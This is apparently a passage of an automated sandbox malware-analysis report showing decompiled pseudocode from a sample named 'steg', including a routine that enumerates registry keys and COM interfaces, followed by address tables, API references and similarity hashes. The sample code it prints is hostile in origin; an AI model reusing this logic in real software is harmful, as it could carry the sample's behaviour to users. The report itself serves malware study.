							_t84 = E00FEE842(0x20, 0x40);
							 *(_t99 - 0x20) = _t84;
							__eflags = _t84;
							if(_t84 == 0) {
								break;
							}
							 *(0x487f50 + _t78 * 4) = _t84;
							 *0x48828c =  *0x48828c + 0x20;
							__eflags =  *0x48828c;
							while(1) {
								__eflags = _t84 -  *(0x487f50 + _t78 * 4) + 0x800;
								if(__eflags >= 0) {
									break;
								}
								 *((short*)(_t84 + 4)) = 0xa00;
								 *_t84 =  *_t84 | 0xffffffff;
								 *(_t84 + 8) =  *(_t84 + 8) & 0x00000000;
								_t84 = _t84 + 0x40;
								 *(_t99 - 0x20) = _t84;
							}
							_t94 = _t78 << 5;
							 *(_t99 - 0x1c) = _t94;
							 *((char*)( *((intOrPtr*)(0x487f50 + (_t94 >> 5) * 4)) + ((_t94 & 0x0000001f) << 6) + 4)) = 1;
							_push(_t94);
							_t62 = E00FF5AA7(_t78, _t92, _t94, __eflags);
							__eflags = _t62;
							if(_t62 == 0) {
								_t94 = _t94 | 0xffffffff;
								__eflags = _t94;
								 *(_t99 - 0x1c) = _t94;
							}
							break;
						} else {
							goto L5;
						}
						while(1) {
							L5:
							 *(_t99 - 0x20) = _t92;
							__eflags = _t92 -  *(0x487f50 + _t78 * 4) + 0x800;
							if(_t92 >=  *(0x487f50 + _t78 * 4) + 0x800) {
								break;
							}
							__eflags =  *(_t92 + 4) & 0x00000001;
							if(( *(_t92 + 4) & 0x00000001) != 0) {
								L14:
								_t92 = _t92 + 0x40;
								continue;
							}
							__eflags =  *(_t92 + 8);
							if( *(_t92 + 8) == 0) {
								E00FEE448(0xa);
								 *(_t99 - 4) = 1;
								__eflags =  *(_t92 + 8);
								if( *(_t92 + 8) == 0) {
									_t18 = _t92 + 0xc; // 0x8000000c
									 *0x4701a8(_t18, 0xfa0);
									_t19 = _t92 + 8;
									 *_t19 =  *(_t92 + 8) + 1;
									__eflags =  *_t19;
								}
								_t21 = _t99 - 4;
								 *_t21 =  *(_t99 - 4) & 0x00000000;
								__eflags =  *_t21;
								E00FF5C07();
							}
							__eflags =  *(_t99 - 0x24);
							if( *(_t99 - 0x24) == 0) {
								_t24 = _t92 + 0xc; // 0x8000000c
								 *0x47006c(_t24);
								__eflags =  *(_t92 + 4) & 0x00000001;
								if(( *(_t92 + 4) & 0x00000001) == 0) {
									__eflags =  *(_t99 - 0x24);
									if( *(_t99 - 0x24) != 0) {
										goto L14;
									}
									 *(_t92 + 4) = 1;
									 *_t92 =  *_t92 | 0xffffffff;
									_t94 = (_t92 -  *(0x487f50 + _t78 * 4) >> 6) + (_t78 << 5);
									__eflags = _t94;
									 *(_t99 - 0x1c) = _t94;
									break;
								}
								_t28 = _t92 + 0xc; // 0x8000000c
								 *0x470070(_t28);
							}
							goto L14;
						}
						__eflags = _t94 - 0xffffffff;
						if(_t94 != 0xffffffff) {
							break;
						}
						_t78 = _t78 + 1;
					}
					 *(_t99 - 4) = 0xfffffffe;
					E00FF5CCF();
					_t54 = _t94;
					L26:
					return E00FEEC9C(_t54);
				}
				_t54 = _t51 | _t94;
				goto L26;
			}












                                                                                                                    0x00ff5b33
                                                                                                                    0x00ff5b33
                                                                                                                    0x00ff5b35
                                                                                                                    0x00ff5b3a
                                                                                                                    0x00ff5b3f
                                                                                                                    0x00ff5b42
                                                                                                                    0x00ff5b45
                                                                                                                    0x00ff5b49
                                                                                                                    0x00ff5b4b
                                                                                                                    0x00ff5b53
                                                                                                                    0x00ff5b5e
                                                                                                                    0x00ff5b64
                                                                                                                    0x00ff5b68
                                                                                                                    0x00ff5b68
                                                                                                                    0x00ff5b6a
                                                                                                                    0x00ff5b6a
                                                                                                                    0x00ff5b6d
                                                                                                                    0x00ff5b70
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00ff5b76
                                                                                                                    0x00ff5b7d
                                                                                                                    0x00ff5b7f
                                                                                                                    0x00ff5c4a
                                                                                                                    0x00ff5c4c
                                                                                                                    0x00ff5c4f
                                                                                                                    0x00ff5c51
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00ff5c53
                                                                                                                    0x00ff5c5a
                                                                                                                    0x00ff5c5a
                                                                                                                    0x00ff5c61
                                                                                                                    0x00ff5c6d
                                                                                                                    0x00ff5c6f
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00ff5c71
                                                                                                                    0x00ff5c77
                                                                                                                    0x00ff5c7a
                                                                                                                    0x00ff5c7e
                                                                                                                    0x00ff5c81
                                                                                                                    0x00ff5c81
                                                                                                                    0x00ff5c88
                                                                                                                    0x00ff5c8b
                                                                                                                    0x00ff5ca2
                                                                                                                    0x00ff5ca7
                                                                                                                    0x00ff5ca8
                                                                                                                    0x00ff5cae
                                                                                                                    0x00ff5cb0
                                                                                                                    0x00ff5cb2
                                                                                                                    0x00ff5cb2
                                                                                                                    0x00ff5cb5
                                                                                                                    0x00ff5cb5
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00ff5b85
                                                                                                                    0x00ff5b85
                                                                                                                    0x00ff5b85
                                                                                                                    0x00ff5b94
                                                                                                                    0x00ff5b96
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00ff5b9c
                                                                                                                    0x00ff5ba0
                                                                                                                    0x00ff5bf9
                                                                                                                    0x00ff5bf9
                                                                                                                    0x00000000
                                                                                                                    0x00ff5bf9
                                                                                                                    0x00ff5ba2
                                                                                                                    0x00ff5ba6
                                                                                                                    0x00ff5baa
                                                                                                                    0x00ff5bb0
                                                                                                                    0x00ff5bb7
                                                                                                                    0x00ff5bbb
                                                                                                                    0x00ff5bc2
                                                                                                                    0x00ff5bc6
                                                                                                                    0x00ff5bcc
                                                                                                                    0x00ff5bcc
                                                                                                                    0x00ff5bcc
                                                                                                                    0x00ff5bcc
                                                                                                                    0x00ff5bcf
                                                                                                                    0x00ff5bcf
                                                                                                                    0x00ff5bcf
                                                                                                                    0x00ff5bd3
                                                                                                                    0x00ff5bd3
                                                                                                                    0x00ff5bdb
                                                                                                                    0x00ff5bdd
                                                                                                                    0x00ff5bdf
                                                                                                                    0x00ff5be3
                                                                                                                    0x00ff5be9
                                                                                                                    0x00ff5bed
                                                                                                                    0x00ff5c13
                                                                                                                    0x00ff5c15
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00ff5c17
                                                                                                                    0x00ff5c1b
                                                                                                                    0x00ff5c2f
                                                                                                                    0x00ff5c2f
                                                                                                                    0x00ff5c31
                                                                                                                    0x00000000
                                                                                                                    0x00ff5c31
                                                                                                                    0x00ff5bef
                                                                                                                    0x00ff5bf3
                                                                                                                    0x00ff5bf3
                                                                                                                    0x00000000
                                                                                                                    0x00ff5bdd
                                                                                                                    0x00ff5c34
                                                                                                                    0x00ff5c37
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00ff5c39
                                                                                                                    0x00ff5c39
                                                                                                                    0x00ff5cb8
                                                                                                                    0x00ff5cbf
                                                                                                                    0x00ff5cc4
                                                                                                                    0x00ff5cc6
                                                                                                                    0x00ff5ccb
                                                                                                                    0x00ff5ccb
                                                                                                                    0x00ff5b55
                                                                                                                    0x00000000

                                                                                                                    APIs
                                                                                                                    • __mtinitlocknum.LIBCMT ref: 00FF5B4B
                                                                                                                      • Part of subcall function 00FEE4D0: __FF_MSGBANNER.LIBCMT ref: 00FEE4E5
                                                                                                                      • Part of subcall function 00FEE4D0: __NMSG_WRITE.LIBCMT ref: 00FEE4EC
                                                                                                                      • Part of subcall function 00FEE4D0: __malloc_crt.LIBCMT ref: 00FEE50C
                                                                                                                    • __lock.LIBCMT ref: 00FF5B5E
                                                                                                                    • __lock.LIBCMT ref: 00FF5BAA
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.282081034.0000000000F82000.00000002.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.282060224.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f80000_steg.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: __lock$__malloc_crt__mtinitlocknum
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1818312207-0
                                                                                                                    • Opcode ID: ce6aae9b49ed4f2fd07869c2a7d86244dfa9258787175d0d58d33f75fd344ad8
                                                                                                                    • Instruction ID: 0f3564e579db33ad3e349aa4326a55f926a3771139988a708d372e86725006d9
                                                                                                                    • Opcode Fuzzy Hash: ce6aae9b49ed4f2fd07869c2a7d86244dfa9258787175d0d58d33f75fd344ad8
                                                                                                                    • Instruction Fuzzy Hash: 49412771D00B19DBDB109F79DC4476CB7A0AF01B35F20822CE726A72E1C7789840AB84
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00F8DA77 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 361COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 49%
                                                                                                                    			E00F8DA77() {
				signed int _v8;
				char _v12;
				intOrPtr _v20;
				signed int _v24;
				void _v68;
				char _v88;
				char _v144;
				void _v148;
				char _v152;
				signed int _v156;
				void _v228;
				long _v1112;
				char _v1252;
				long _v2136;
				char _v3160;
				char _v4184;
				long _v5208;
				char _v6232;
				char _v6248;
				char _v6264;
				void* _v6268;
				void* _v6272;
				void* _v6276;
				char _v6280;
				void* _v6284;
				char _v6288;
				void* _v6292;
				char _v6400;
				char _v33252;
				char _v53252;
				char _v53268;
				char _v53284;
				void* _v53288;
				int _v53292;
				char _v53296;
				void* _v53300;
				short _v53304;
				char _v53308;
				intOrPtr _v53344;
				char _v53348;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t214;
				intOrPtr _t217;
				intOrPtr* _t231;
				intOrPtr* _t233;
				intOrPtr* _t235;
				intOrPtr* _t237;
				intOrPtr* _t240;
				intOrPtr _t244;
				short* _t249;
				intOrPtr* _t250;
				signed int _t252;
				void* _t254;
				intOrPtr _t258;
				intOrPtr _t264;
				void* _t266;
				void* _t271;
				void* _t276;
				void* _t277;
				signed int _t283;
				intOrPtr* _t287;
				intOrPtr* _t291;
				void* _t295;
				intOrPtr* _t298;
				intOrPtr* _t305;
				char _t306;
				intOrPtr* _t307;
				intOrPtr* _t311;
				intOrPtr* _t313;
				void* _t332;
				char _t336;
				void* _t340;
				void* _t342;
				void* _t347;
				void* _t366;
				char* _t368;
				signed char _t381;
				void* _t392;
				intOrPtr _t395;
				void* _t400;
				void* _t401;
				void* _t402;
				intOrPtr _t403;
				void* _t404;
				intOrPtr* _t405;
				intOrPtr _t407;
				intOrPtr* _t412;
				intOrPtr* _t423;
				intOrPtr* _t427;
				intOrPtr* _t429;
				intOrPtr* _t458;
				void* _t463;
				void* _t465;
				void* _t466;
				short _t471;
				void* _t472;
				intOrPtr _t479;
				intOrPtr _t480;
				intOrPtr* _t481;
				void* _t482;
				char* _t483;
				void* _t486;
				intOrPtr* _t489;
				char* _t490;
				char* _t491;
				char* _t492;
				void* _t493;
				void* _t494;
				char* _t495;
				char* _t496;
				signed int _t497;
				signed int _t498;
				void* _t499;
				void* _t500;
				void* _t502;
				void* _t503;
				signed int _t504;
				void* _t505;
				void* _t508;
				void* _t509;
				void* _t510;
				void* _t511;

				E00FE7307(0xd060);
				_v8 =  *0x481f80 ^ _t497;
				memcpy( &_v68, 0x47058c, 0xe << 2);
				_t500 = _t499 + 0xc;
				asm("movsw");
				_push( &_v53296);
				_push(1);
				asm("movsb");
				_t471 = 0;
				_push(0);
				_push( &_v68);
				_push(0x80000001);
				_v53292 = 0x400;
				_v53304 = 0;
				if( *0x470028() != 0) {
					L60:
					_pop(_t472);
					_pop(_t486);
					return E00FE72F2(_t210, _t400, _v8 ^ _t497, _t460, _t472, _t486);
				} else {
					_t401 = 0;
					_v53292 = 0x400;
					_t214 =  *0x470000(_v53296, 0,  &_v1252,  &_v53292, 0, 0, 0, 0, _t400);
					if(_t214 != 0x103) {
						_t496 =  &_v33252;
						while(_t214 == 0) {
							_t458 =  &_v1252;
							_t460 = _t458 + 1;
							do {
								_t395 =  *_t458;
								_t458 = _t458 + 1;
							} while (_t395 != 0);
							if(_t458 - _t460 < 1) {
								L9:
								_t401 = _t401 + 1;
								_v53292 = 0x400;
								_t214 =  *0x470000(_v53296, _t401,  &_v1252,  &_v53292, 0, 0, 0, 0);
								if(_t214 != 0x103) {
									continue;
								}
							} else {
								if(_t471 < 0xfa) {
									E00FE7AF9(_t496, 0x80,  &_v1252);
									_t500 = _t500 + 0xc;
									_t471 = _t471 + 1;
									_t496 = _t496 - 0xffffff80;
									goto L9;
								}
							}
							break;
						}
						_v53304 = _t471;
					}
					_t210 =  *0x47002c(_v53296);
					if(_t471 < 1) {
						L59:
						_pop(_t400);
						goto L60;
					} else {
						_t402 = 0x47f000;
						do {
							E00F8BBD7(_t460, _t402,  &_v1252, 0x3e8);
							_t412 =  &_v1252;
							_t500 = _t500 + 0xc;
							_t460 = _t412 + 1;
							do {
								_t217 =  *_t412;
								_t412 = _t412 + 1;
							} while (_t217 != 0);
							if(_t412 - _t460 >= 1 && _t471 != 0) {
								_t495 =  &_v33252;
								do {
									_t392 = E00FE80AD( &_v1252, _t495);
									_t500 = _t500 + 8;
									if(_t392 == 0) {
										E00F8CA87(_t460,  &_v1252, _t402);
										_t500 = _t500 + 8;
									}
									_t495 = _t495 - 0xffffff80;
									_t471 = _t471 - 1;
								} while (_t471 != 0);
								_t471 = _v53304;
							}
							_t402 = _t402 + 0x200;
						} while (_t402 < 0x481600);
						memcpy( &_v148, 0x4705d0, 0x13 << 2);
						asm("movsw");
						memcpy( &_v228, 0x470620, 0x13 << 2);
						_t502 = _t500 + 0x18;
						_v53288 = 0;
						asm("movsw");
						 *0x470214(0);
						_t489 =  *0x470210;
						 *_t489( &_v148,  &_v53268);
						 *_t489( &_v228,  &_v53284);
						_push( &_v53288);
						_push( &_v53284);
						_push(1);
						_push(0);
						_push( &_v53268);
						if( *0x47020c() < 0) {
							L58:
							_t210 =  *0x470208();
							goto L59;
						} else {
							_t231 = _v53288;
							_t460 =  &_v53300;
							_push( &_v53300);
							_push(_t231);
							if( *((intOrPtr*)( *_t231 + 0x1c))() < 0) {
								L57:
								_t233 = _v53288;
								 *((intOrPtr*)( *_t233 + 8))(_t233);
								goto L58;
							} else {
								_t235 = _v53300;
								_push( &_v53308);
								_t460 =  &_v53348;
								_push( &_v53348);
								_push(1);
								_push(_t235);
								if( *((intOrPtr*)( *_t235 + 0xc))() != 0) {
									L56:
									_t237 = _v53300;
									 *((intOrPtr*)( *_t237 + 8))(_t237);
									goto L57;
								} else {
									_t403 = _v53304;
									do {
										_t239 = _v53344;
										if(_v53344 == 0) {
											goto L55;
										} else {
											E00FE8804( &_v53252, 0x2710, _t239);
											_t423 =  &_v53252;
											_t503 = _t502 + 0xc;
											_t463 = _t423 + 2;
											do {
												_t244 =  *_t423;
												_t423 = _t423 + 2;
											} while (_t244 != 0);
											E00FE8B83( &_v53252, (_t423 - _t463 >> 1) + 1);
											_push(0x3f);
											_push( &_v53252);
											_t249 = E00FE8756(_t423 - _t463 >> 1);
											_t504 = _t503 + 0x10;
											if(_t249 != 0) {
												 *_t249 = 0;
											}
											_t250 =  &_v53252;
											_t464 = _t250 + 2;
											do {
												_t426 =  *_t250;
												_t250 = _t250 + 2;
											} while (_t426 != 0);
											_t252 = _t250 - _t464 >> 1;
											if( *((short*)(_t497 + _t252 * 2 - 0xd002)) != 0x2f) {
												L37:
												_t254 = E00FE8860(_t426,  &_v53252, 0x470670, 7);
												_t505 = _t504 + 0xc;
												if(_t254 == 0) {
													L39:
													E00F8BBD7(_t464,  &_v53252,  &_v1252, 0x3e8);
													_t427 =  &_v1252;
													_t502 = _t505 + 0xc;
													_t465 = _t427 + 1;
													do {
														_t258 =  *_t427;
														_t427 = _t427 + 1;
													} while (_t258 != 0);
													if(_t427 - _t465 >= 1) {
														if(_t403 != 0) {
															_t491 =  &_v33252;
															_t480 = _t403;
															do {
																_t271 = E00FE80AD( &_v1252, _t491);
																_t502 = _t502 + 8;
																if(_t271 == 0) {
																	E00F8CA87(_t465,  &_v1252,  &_v53252);
																	_t502 = _t502 + 8;
																}
																_t491 = _t491 - 0xffffff80;
																_t480 = _t480 - 1;
															} while (_t480 != 0);
														}
														E00FE86EA( &_v53252, 0x2710, 0x470694);
														E00F8BBD7(_t465,  &_v53252,  &_v1252, 0x3e8);
														_t429 =  &_v1252;
														_t502 = _t502 + 0x18;
														_t466 = _t429 + 1;
														do {
															_t264 =  *_t429;
															_t429 = _t429 + 1;
														} while (_t264 != 0);
														if(_t429 - _t466 >= 1 && _t403 != 0) {
															_t490 =  &_v33252;
															_t479 = _t403;
															do {
																_t266 = E00FE80AD( &_v1252, _t490);
																_t502 = _t502 + 8;
																if(_t266 == 0) {
																	E00F8CA87(_t466,  &_v1252,  &_v53252);
																	_t502 = _t502 + 8;
																}
																_t490 = _t490 - 0xffffff80;
																_t479 = _t479 - 1;
															} while (_t479 != 0);
														}
													}
												} else {
													_t276 = E00FE8860(_t426,  &_v53252, 0x470680, 8);
													_t502 = _t505 + 0xc;
													if(_t276 == 0) {
														goto L39;
													}
												}
												goto L55;
											} else {
												_t277 = _t252 * 2 - 2;
												if(_t277 >= 0x4e20) {
													E00FE7EEC();
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													_t498 = _t504;
													E00FE7307(0x1880);
													_t283 =  *0x481f80 ^ _t498;
													_v156 = _t283;
													 *[fs:0x0] =  &_v152;
													_v6400 = 0;
													_v144 = 0;
													_t492 =  *0x4700f4(0x470520, _t283, _t480, _t491, _t403,  *[fs:0x0], 0x46fccc, 0xffffffff, _t497);
													if(_t492 != 0) {
														_t481 =  *0x470110(_t492, 0x47052c);
														if(_t481 != 0) {
															_t287 = _v6268;
															if(_t287 != 0) {
																 *((intOrPtr*)( *_t287 + 8))(_t287);
															}
															_push(0);
															_push(0);
															_push(0);
															_push( &_v6268);
															_v6268 = 0;
															if( *_t481() < 0) {
																goto L66;
															} else {
																_t483 = _v6268;
																_v12 = 1;
																_v6272 = 0;
																if(_t483 == 0) {
																	L71:
																	E00FFA287(0x80004003);
																}
																_push( &_v6272);
																_push(0);
																_push(0);
																_push(_t483);
																if( *((intOrPtr*)( *_t483 + 0x38))() >= 0) {
																	_t295 = _v6272;
																	if(_t295 == 0) {
																		goto L71;
																	} else {
																		_t405 =  *0x470100;
																		while(1) {
																			_push(0);
																			_t464 =  &_v6248;
																			_push( &_v6248);
																			_push(1);
																			_push(_t295);
																			if( *((intOrPtr*)( *_t295 + 0xc))() != 0) {
																				break;
																			}
																			asm("movq xmm0, [ebp-0x1860]");
																			asm("movq [eax], xmm0");
																			asm("movq xmm0, [ebp-0x1858]");
																			asm("movq [eax+0x8], xmm0");
																			swprintf( &_v5208, 0x400, 0x470544);
																			_t504 = _t504 - 0x10 + 0x1c;
																			_t492 = _v6268;
																			_v12 = 2;
																			_v6284 = 0;
																			if(_t492 == 0) {
																				goto L71;
																			} else {
																				_push( &_v6284);
																				_push(0);
																				_push( &_v6248);
																				_push(0);
																				_push(_t492);
																				if( *((intOrPtr*)( *_t492 + 0x3c))() >= 0) {
																					while(1) {
																						_t305 = _v6284;
																						if(_t305 == 0) {
																							goto L71;
																						}
																						_t464 =  &_v6264;
																						_t306 =  *((intOrPtr*)( *_t305 + 0xc))(_t305, 1,  &_v6264, 0);
																						if(_t306 != 0) {
																							goto L81;
																						} else {
																							_t492 = _v6268;
																							_v12 = 3;
																							_v6276 = _t306;
																							if(_t492 == 0) {
																								goto L71;
																							} else {
																								_push( &_v6276);
																								_push(0);
																								_push( &_v6264);
																								_push( &_v6248);
																								_push(0);
																								_push(_t492);
																								if( *((intOrPtr*)( *_t492 + 0x54))() >= 0) {
																									while(1) {
																										L93:
																										_t311 = _v6276;
																										if(_t311 == 0) {
																											goto L71;
																										}
																										_push(0);
																										_t464 =  &_v6288;
																										_push( &_v6288);
																										_push(1);
																										_push(_t311);
																										if( *((intOrPtr*)( *_t311 + 0xc))() != 0) {
																											goto L90;
																										} else {
																											E00FE7C87( &_v1112, _t312, 0x400);
																											E00FE7C87( &_v2136, 0, 0x400);
																											E00FE7C87( &_v4184, 0, 0x400);
																											E00FE7C87( &_v3160, 0, 0x400);
																											swprintf( &_v1112, 0x400, 0x470548, _v6288);
																											E00FE7AF9( &_v6232, 0x400,  &_v1112);
																											E00FE8317( &_v6232, 0x400);
																											_t492 = _v6268;
																											_t504 = _t504 + 0x54;
																											_v6292 = 0;
																											_v6280 = 0;
																											if(_t492 == 0) {
																												goto L71;
																											} else {
																												_push(0);
																												_push(0);
																												_push( &_v6280);
																												_push( &_v6292);
																												_push(_v6288);
																												_push( &_v6264);
																												_push( &_v6248);
																												_push(0);
																												_push(_t492);
																												if( *((intOrPtr*)( *_t492 + 0x44))() >= 0) {
																													_t332 =  *0x4700f8(_v6280);
																													_t483 = _v6292;
																													_t159 = _t483 - 1; // -1
																													if(_t332 >= _t159) {
																														swprintf( &_v2136, 0x400, 0x470310, _v6280);
																														_t504 = _t504 + 0x10;
																														goto L106;
																													} else {
																														_t494 = 0;
																														_t464 = 0;
																														if(_t483 != 0) {
																															_t407 = _v6280;
																															do {
																																_t381 =  *((intOrPtr*)(_t464 + _t407));
																																_t455 =  ==  ? 0x2c : _t381 & 0x000000ff;
																																 *((char*)(_t498 + _t494 - 0x850)) =  ==  ? 0x2c : _t381 & 0x000000ff;
																																_t464 = _t464 + 2;
																																_t494 = _t494 + 1;
																															} while (_t464 < _t483);
																															_t405 =  *0x470100;
																														}
																														_t492 = _t494 - 1;
																														if(_t492 >= 0x400) {
																															E00FE7EEC();
																															goto L122;
																														} else {
																															 *((char*)(_t498 + _t492 - 0x850)) = 0;
																															L106:
																															_t336 =  *_t405( &_v5208, 0x47054c);
																															if(_t336 == 0) {
																																_v3160 = _t336;
																																_t492 = E00FE8487( &_v2136, 0x470558);
																																_t511 = _t504 + 8;
																																if(_t492 != 0) {
																																	_t171 = _t492 + 1; // 0x1
																																	E00FE7AF9( &_v3160, 0x400, _t171);
																																	 *_t492 = 0;
																																	E00FE7AF9( &_v4184, 0x400,  &_v2136);
																																	_t511 = _t511 + 0x18;
																																}
																																E00F8EF07(4,  &_v1112,  &_v4184,  &_v3160);
																																_t504 = _t511 + 0x10;
																															}
																															_push(0x47055c);
																															_push( &_v5208);
																															if( *_t405() != 0) {
																																continue;
																															} else {
																																_t340 = E00FE8487( &_v1112, 0x470568);
																																_t504 = _t504 + 8;
																																if(_t340 != 0) {
																																	continue;
																																} else {
																																	_t342 = E00FE8487( &_v1112, 0x470574);
																																	_t508 = _t504 + 8;
																																	if(_t342 != 0) {
																																		_t368 = E00FE8487( &_v1112, 0x470574);
																																		_t508 = _t508 + 8;
																																		 *_t368 = 0;
																																	}
																																	 *0x4700fc( &_v88,  &_v1112, 8);
																																	_t347 = E00FE8487( &_v88, 0x47057c);
																																	_t509 = _t508 + 8;
																																	if(_t347 != 0) {
																																		L116:
																																		_t483 =  &_v2136;
																																		_t492 = E00FE71C7(_t483, 0x2c);
																																		_t504 = _t509 + 8;
																																		if(_t492 == 0) {
																																			continue;
																																		} else {
																																			while(1) {
																																				 *_t492 = 0;
																																				E00FE7AF9( &_v4184, 0x400, _t483);
																																				_t188 = _t492 + 1; // 0x1
																																				_t406 = _t188;
																																				_t483 = E00FE71C7(_t188, 0x2c);
																																				_t510 = _t504 + 0x14;
																																				if(_t483 == 0) {
																																					break;
																																				}
																																				 *_t483 = 0;
																																				E00FE7AF9( &_v3160, 0x400, _t406);
																																				E00F8EF07(4,  &_v1112,  &_v4184,  &_v3160);
																																				_t483 = _t483 + 1;
																																				_t492 = E00FE71C7(_t483, 0x2c);
																																				_t504 = _t510 + 0x24;
																																				if(_t492 != 0) {
																																					continue;
																																				} else {
																																					L92:
																																					_t405 =  *0x470100;
																																					goto L93;
																																				}
																																				goto L123;
																																			}
																																			_t492 = _t492 + 1;
																																			E00FE7AF9( &_v3160, 0x400, _t492);
																																			E00F8EF07(4,  &_v1112,  &_v4184,  &_v3160);
																																			_t504 = _t510 + 0x1c;
																																			goto L92;
																																		}
																																	} else {
																																		_t366 = E00FE8487( &_v88, 0x470584);
																																		_t504 = _t509 + 8;
																																		if(_t366 == 0) {
																																			continue;
																																		} else {
																																			goto L116;
																																		}
																																	}
																																}
																															}
																															goto L126;
																														}
																													}
																												} else {
																													E00FFA2A7( &_v6248, _t331, _t492, 0x470300);
																													continue;
																												}
																											}
																										}
																										goto L123;
																									}
																									goto L71;
																								} else {
																									E00FFA2A7( &_v6248, _t310, _t492, 0x470300);
																									L90:
																									_t313 = _v6276;
																									_v12 = 2;
																									if(_t313 != 0) {
																										 *((intOrPtr*)( *_t313 + 8))(_t313);
																									}
																									continue;
																								}
																							}
																						}
																						goto L123;
																					}
																					goto L71;
																				} else {
																					E00FFA2A7( &_v6248, _t304, _t492, 0x470300);
																					L81:
																					_t307 = _v6284;
																					_v12 = 1;
																					if(_t307 != 0) {
																						 *((intOrPtr*)( *_t307 + 8))(_t307);
																					}
																					_t295 = _v6272;
																					if(_t295 != 0) {
																						continue;
																					} else {
																						goto L71;
																					}
																				}
																			}
																			goto L123;
																		}
																		L122:
																		_t298 = _v6272;
																		_v12 = 0;
																		if(_t298 != 0) {
																			goto L74;
																		}
																	}
																} else {
																	E00FFA2A7( &_v6272, _t294, _t483, 0x470300);
																	 *0x470114(_t492);
																	_t298 = _v6272;
																	_v12 = 0;
																	if(_t298 != 0) {
																		L74:
																		 *((intOrPtr*)( *_t298 + 8))(_t298);
																	}
																}
															}
														} else {
															 *0x470124();
															L66:
															 *0x470114(_t492);
														}
													} else {
														 *0x470124();
													}
													L123:
													_t291 = _v6268;
													_v12 = 0xffffffff;
													if(_t291 != 0) {
														_t291 =  *((intOrPtr*)( *_t291 + 8))(_t291);
													}
													 *[fs:0x0] = _v20;
													_pop(_t482);
													_pop(_t493);
													_pop(_t404);
													return E00FE72F2(_t291, _t404, _v24 ^ _t498, _t464, _t482, _t493);
												} else {
													_t426 = 0;
													 *((short*)(_t497 + _t277 - 0xd000)) = 0;
													goto L37;
												}
											}
										}
										goto L126;
										L55:
										_t240 = _v53300;
										_push( &_v53308);
										_t460 =  &_v53348;
										_push( &_v53348);
										_push(1);
										_push(_t240);
									} while ( *((intOrPtr*)( *_t240 + 0xc))() == 0);
									goto L56;
								}
							}
						}
					}
				}
				L126:
			}































































































































                                                                                                                    0x00f8da7f
                                                                                                                    0x00f8da8b
                                                                                                                    0x00f8da9d
                                                                                                                    0x00f8da9d
                                                                                                                    0x00f8da9f
                                                                                                                    0x00f8daa7
                                                                                                                    0x00f8daa8
                                                                                                                    0x00f8daaa
                                                                                                                    0x00f8daab
                                                                                                                    0x00f8daad
                                                                                                                    0x00f8dab1
                                                                                                                    0x00f8dab2
                                                                                                                    0x00f8dab7
                                                                                                                    0x00f8dac1
                                                                                                                    0x00f8dacf
                                                                                                                    0x00f8df0a
                                                                                                                    0x00f8df0d
                                                                                                                    0x00f8df10
                                                                                                                    0x00f8df19
                                                                                                                    0x00f8dad5
                                                                                                                    0x00f8dad6
                                                                                                                    0x00f8daf1
                                                                                                                    0x00f8dafb
                                                                                                                    0x00f8db06
                                                                                                                    0x00f8db08
                                                                                                                    0x00f8db0e
                                                                                                                    0x00f8db12
                                                                                                                    0x00f8db18
                                                                                                                    0x00f8db1b
                                                                                                                    0x00f8db1b
                                                                                                                    0x00f8db1d
                                                                                                                    0x00f8db1e
                                                                                                                    0x00f8db27
                                                                                                                    0x00f8db4a
                                                                                                                    0x00f8db60
                                                                                                                    0x00f8db68
                                                                                                                    0x00f8db72
                                                                                                                    0x00f8db7d
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00f8db29
                                                                                                                    0x00f8db2f
                                                                                                                    0x00f8db3e
                                                                                                                    0x00f8db43
                                                                                                                    0x00f8db46
                                                                                                                    0x00f8db47
                                                                                                                    0x00000000
                                                                                                                    0x00f8db47
                                                                                                                    0x00f8db2f
                                                                                                                    0x00000000
                                                                                                                    0x00f8db27
                                                                                                                    0x00f8db7f
                                                                                                                    0x00f8db7f
                                                                                                                    0x00f8db8b
                                                                                                                    0x00f8db94
                                                                                                                    0x00f8df09
                                                                                                                    0x00f8df09
                                                                                                                    0x00000000
                                                                                                                    0x00f8db9a
                                                                                                                    0x00f8db9a
                                                                                                                    0x00f8dba7
                                                                                                                    0x00f8dbb4
                                                                                                                    0x00f8dbb9
                                                                                                                    0x00f8dbbf
                                                                                                                    0x00f8dbc2
                                                                                                                    0x00f8dbc7
                                                                                                                    0x00f8dbc7
                                                                                                                    0x00f8dbc9
                                                                                                                    0x00f8dbca
                                                                                                                    0x00f8dbd3
                                                                                                                    0x00f8dbd9
                                                                                                                    0x00f8dbdf
                                                                                                                    0x00f8dbe7
                                                                                                                    0x00f8dbec
                                                                                                                    0x00f8dbf1
                                                                                                                    0x00f8dbfb
                                                                                                                    0x00f8dc00
                                                                                                                    0x00f8dc00
                                                                                                                    0x00f8dc03
                                                                                                                    0x00f8dc06
                                                                                                                    0x00f8dc06
                                                                                                                    0x00f8dc09
                                                                                                                    0x00f8dc09
                                                                                                                    0x00f8dc0f
                                                                                                                    0x00f8dc15
                                                                                                                    0x00f8dc2d
                                                                                                                    0x00f8dc2f
                                                                                                                    0x00f8dc41
